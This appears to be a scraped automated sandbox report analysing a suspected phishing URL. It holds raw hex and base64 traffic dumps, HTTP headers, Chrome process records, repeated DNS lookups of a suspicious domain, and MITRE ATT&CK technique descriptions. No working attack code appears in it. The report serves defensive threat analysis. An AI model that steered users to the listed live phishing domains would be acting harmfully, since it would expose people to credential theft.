2025-01-09 16:08:09 UTC	16384	IN	Data Raw: 74 6e 49 52 4a 4c 6f 6f 62 41 45 70 39 65 6b 46 72 30 38 33 45 47 59 79 53 53 43 4f 53 4b 4a 2b 61 77 4b 47 6a 69 43 35 53 64 7a 70 55 35 6f 70 75 4b 33 6a 76 62 48 78 56 67 69 79 52 6b 4b 56 6c 5a 4a 2f 4c 37 71 65 6d 31 36 43 72 59 4f 33 32 58 74 53 6a 41 4d 7a 47 36 55 61 41 69 68 65 69 4e 61 4b 77 2b 49 45 68 6e 66 30 76 48 48 42 38 6b 56 68 6a 75 36 37 38 56 74 31 37 6a 4c 4d 5a 31 54 4c 37 4f 49 2b 44 43 66 39 76 53 4e 6c 6e 79 62 5a 49 75 39 76 74 42 42 75 7a 51 69 5a 72 4d 58 4d 75 65 4a 6f 79 71 38 6b 68 41 56 65 6d 64 57 52 70 68 55 62 44 65 6d 49 62 75 4d 39 4d 4f 53 51 32 35 4b 68 45 6d 38 6a 53 42 4a 67 7a 6f 2b 34 37 49 54 70 39 5a 69 57 45 79 72 38 70 44 38 32 65 44 69 74 55 57 41 6c 70 4f 54 37 67 50 6b 69 33 48 75 64 31 78 35 44 2b 44 51 Data Ascii: tnIRJLoobAEp9ekFr083EGYySSCOSKJ+awKGjiC5SdzpU5opuK3jvbHxVgiyRkKVlZJ/L7qem16CrYO32XtSjAMzG6UaAiheiNaKw+IEhnf0vHHB8kVhju678Vt17jLMZ1TL7OI+DCf9vSNlnybZIu9vtBBuzQiZrMXMueJoyq8khAVemdWRphUbDemIbuM9MOSQ25KhEm8jSBJgzo+47ITp9ZiWEyr8pD82eDitUWAlpOT7gPki3Hud1x5D+DQ
2025-01-09 16:08:09 UTC	16384	IN	Data Raw: 2b 4a 67 34 4a 4b 36 61 6d 75 4b 57 36 4b 58 39 51 58 34 61 4f 74 6d 79 4d 33 54 71 4f 70 6c 72 70 57 77 66 4c 6b 4c 76 67 35 2f 65 79 79 4b 64 45 55 79 35 6f 48 66 74 6d 73 64 59 78 68 43 34 58 4d 39 70 43 2b 67 6c 31 7a 66 57 61 77 61 4e 54 42 39 36 77 52 57 66 36 6f 6d 2f 56 64 4f 78 56 69 4c 4c 38 38 66 41 73 69 4e 49 46 45 6f 34 31 66 57 79 35 5a 2f 74 56 63 4d 2f 78 74 56 6c 52 4b 79 70 62 6f 47 4f 73 6c 56 6b 50 59 35 7a 70 30 55 62 69 33 4a 68 5a 7a 50 7a 69 46 2b 73 55 44 4b 4d 54 55 5a 62 6e 48 4a 52 50 4a 54 67 5a 6e 43 78 33 4f 50 6f 62 78 6d 73 51 48 76 6b 78 7a 44 30 6a 4c 59 4a 46 2b 6b 58 78 42 43 41 39 68 7a 43 72 69 32 6a 65 62 6a 6e 70 50 2b 33 4f 4e 37 79 73 50 69 6d 31 65 78 38 42 65 4b 59 54 6d 4e 32 2b 36 64 78 34 41 42 2b 68 6d 77 Data Ascii: +Jg4JK6amuKW6KX9QX4aOtmyM3TqOplrpWwfLkLvg5/eyyKdEUy5oHftmsdYxhC4XM9pC+gl1zfWawaNTB96wRWf6om/VdOxViLL88fAsiNIFEo41fWy5Z/tVcM/xtVlRKypboGOslVkPY5zp0Ubi3JhZzPziF+sUDKMTUZbnHJRPJTgZnCx3OPobxmsQHvkxzD0jLYJF+kXxBCA9hzCri2jebjnpP+3ON7ysPim1ex8BeKYTmN2+6dx4AB+hmw
2025-01-09 16:08:09 UTC	16322	IN	Data Raw: 74 7a 53 57 37 36 69 6a 34 2b 33 72 75 72 6a 2f 62 53 42 44 33 48 63 76 58 31 2f 66 2b 67 76 33 72 6a 72 6d 39 2f 38 55 77 36 36 59 4d 7a 32 58 72 65 75 43 4b 53 58 71 42 5a 68 66 6a 47 74 6f 59 51 2f 70 6d 75 62 71 36 79 49 6e 35 67 4c 6b 6d 43 72 45 69 2b 36 66 49 43 62 54 79 4c 5a 41 37 4b 5a 44 7a 52 42 31 75 70 68 7a 39 72 45 6f 4b 6c 6d 36 31 56 2f 67 78 75 42 78 35 41 65 6e 68 75 36 6d 46 54 71 61 57 6b 4e 36 65 71 43 56 6c 34 4b 74 37 4a 74 56 6d 67 5a 46 4b 31 66 6c 62 52 4d 6e 45 52 73 37 55 39 68 68 42 44 5a 52 34 37 4e 57 46 36 42 75 61 7a 54 4a 72 30 59 53 39 57 67 58 6a 71 70 4e 36 37 59 55 69 49 62 6c 57 52 58 66 79 6f 78 41 4e 4a 74 50 4d 64 66 4e 2f 78 33 52 79 31 7a 32 64 34 70 2f 4c 58 5a 6c 48 62 2f 4f 4b 75 58 74 4b 6b 44 33 34 6e 71 Data Ascii: tzSW76ij4+3rurj/bSBD3HcvX1/f+gv3rjrm9/8Uw66YMz2XreuCKSXqBZhfjGtoYQ/pmubq6yIn5gLkmCrEi+6fICbTyLZA7KZDzRB1uphz9rEoKlm61V/gxuBx5Aenhu6mFTqaWkN6eqCVl4Kt7JtVmgZFK1flbRMnERs7U9hhBDZR47NWF6BuazTJr0YS9WgXjqpN67YUiIblWRXfyoxANJtPMdfN/x3Ry1z2d4p/LXZlHb/OKuXtKkD34nq
2025-01-09 16:08:09 UTC	71	IN	Data Raw: 4d 76 4b 53 61 55 50 7a 65 54 70 2b 35 76 64 31 50 68 76 76 78 33 55 5a 74 7a 30 54 74 2f 30 2f 43 35 51 30 4a 70 59 66 69 6b 4a 56 62 39 79 30 55 42 35 4d 37 4d 4b 6e 74 7a 6f 4c 50 70 45 55 38 70 5a 4e 7a 42 70 Data Ascii: MvKSaUPzeTp+5vd1Phvvx3UZtz0Tt/0/C5Q0JpYfikJVb9y0UB5M7MKntzoLPpEU8pZNzBp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	68.65.120.84	443	4564	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:08:09 UTC	603	OUT	GET /favicon.ico HTTP/1.1 Host: clinicasanclemente.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://clinicasanclemente.com/ap/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 16:08:09 UTC	319	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 16:08:09 GMT server: LiteSpeed vary: User-Agent x-turbo-charged-by: LiteSpeed connection: close
2025-01-09 16:08:09 UTC	1251	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 4308, Parent PID: 5076

General

Target ID:	0
Start time:	11:07:57
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4564, Parent PID: 4308

General

Target ID:	2
Start time:	11:08:01
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,17832135286452935298,15271712750092276784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6352, Parent PID: 5076

General

Target ID:	3
Start time:	11:08:07
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clinicasanclemente.com/ap/"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_44, type: DROPPED

Source: global traffic	HTTP traffic detected: GET /ap/ HTTP/1.1Host: clinicasanclemente.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: clinicasanclemente.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://clinicasanclemente.com/ap/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: clinicasanclemente.com
Source: global traffic	DNS traffic detected: DNS query: 0nline1.online-mba.xyz
Source: global traffic	DNS traffic detected: DNS query: google.com

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source:	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source:	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source:	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source:	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: 0nline1.online-mba.xyz

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://clinicasanclemente.com/ap/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 43

Chrome Cache Entry: 44

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 4308, Parent PID: 5076

General

Chronological Activities

Analysis Process: chrome.exePID: 4564, Parent PID: 4308

General

Chronological Activities

Analysis Process: chrome.exePID: 6352, Parent PID: 5076

General

Chronological Activities

Disassembly

Windows Analysis Report
https://clinicasanclemente.com/ap/